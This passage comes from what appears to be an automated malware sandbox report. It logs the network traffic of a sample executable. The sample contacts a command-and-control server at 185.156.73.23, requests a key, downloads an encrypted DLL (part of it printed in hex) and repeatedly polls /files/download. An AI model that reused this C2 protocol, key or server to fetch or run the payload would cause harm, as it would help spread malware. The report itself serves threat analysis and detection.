                                                  Dec 20, 2024 17:10:05.556571960 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.556618929 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.556655884 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.556695938 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.557786942 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.557868958 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.557897091 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.557939053 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.558878899 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.559082031 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.559109926 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.559119940 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.560178041 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.560193062 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.560240030 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.560240030 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.561280012 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.561323881 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.561351061 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.561391115 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.562560081 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.562623024 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.562673092 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.562716007 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.563663960 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.563709974 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.563745975 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.563787937 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.564951897 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.565001965 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.565009117 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.565067053 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.566065073 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.566107988 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.566174030 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.566211939 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.567286015 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.567349911 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.567353010 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.567392111 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.568459988 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.568517923 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.568538904 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.568558931 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.569768906 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.569782972 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.569817066 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.569835901 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.570812941 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.570858955 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.570889950 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.570966959 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.572053909 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.572103024 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.572266102 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.572315931 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.573256016 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.573297977 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.573405027 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.574461937 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.574492931 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.574542999 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.574577093 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.574618101 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.575689077 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.575761080 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.575798988 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.576771975 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.576894045 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.576915026 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.576941967 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.578011990 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.578062057 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.578104973 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.579202890 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.579267979 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.579274893 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.579325914 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.580302000 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.580530882 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.710134983 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.710220098 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.710285902 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.710330963 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.710659027 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.710716963 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.710717916 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.710764885 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.711885929 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.711947918 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.711975098 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.712021112 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.713129997 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.713167906 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.713196993 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.713213921 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:05.714216948 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:05.714284897 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:08.379364014 CET8049935185.156.73.23192.168.2.7
                                                  Dec 20, 2024 17:10:08.379508018 CET4993580192.168.2.7185.156.73.23
                                                  Dec 20, 2024 17:10:38.565264940 CET4993580192.168.2.7185.156.73.23
                                                  • 185.156.73.23
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749821185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:16.908464909 CET414OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: 1
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:18.268279076 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:17 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0
                                                  Dec 20, 2024 17:09:18.280402899 CET388OUTGET /dll/key HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: 1
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:18.792028904 CET224INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:18 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 21
                                                  Keep-Alive: timeout=5, max=99
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                  Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                  Dec 20, 2024 17:09:18.797880888 CET393OUTGET /dll/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: 1
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:19.368071079 CET1236INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:18 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                  Content-Length: 97296
                                                  Keep-Alive: timeout=5, max=98
                                                  Connection: Keep-Alive
                                                  Content-Type: application/octet-stream
                                                  Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                  Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                  Dec 20, 2024 17:09:19.368096113 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                  Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                  Dec 20, 2024 17:09:19.368113995 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                  Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                  Dec 20, 2024 17:09:19.368232012 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                                  Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                                  Dec 20, 2024 17:09:19.368247032 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                                  Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                                  Dec 20, 2024 17:09:19.368263006 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                                  Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                                  Dec 20, 2024 17:09:19.368623972 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                                  Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                                  Dec 20, 2024 17:09:19.368644953 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                                  Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                                  Dec 20, 2024 17:09:19.376415968 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                                  Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                                  Dec 20, 2024 17:09:19.377154112 CET1236INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                                  Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                                  Dec 20, 2024 17:09:19.384824038 CET1236INData Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57
                                                  Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
                                                  Dec 20, 2024 17:09:19.902302027 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:20.389518023 CET203INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:20 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=97
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.749834185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:22.555332899 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:24.041241884 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:23 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.749844185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:26.193824053 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.749850185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:28.377222061 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:30.750502110 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:29 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.749863185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:32.983361006 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:34.341655970 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:34 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.749872185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:36.564640999 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:37.912214041 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:37 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.749880185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:40.178143024 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:41.539449930 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:41 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.749889185.156.73.23804204C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 20, 2024 17:09:43.689964056 CET395OUTGET /files/download HTTP/1.1
                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                  User-Agent: C
                                                  Host: 185.156.73.23
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Dec 20, 2024 17:09:45.036248922 CET204INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 16:09:44 GMT
                                                  Server: Apache/2.4.52 (Ubuntu)
                                                  Content-Length: 1
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
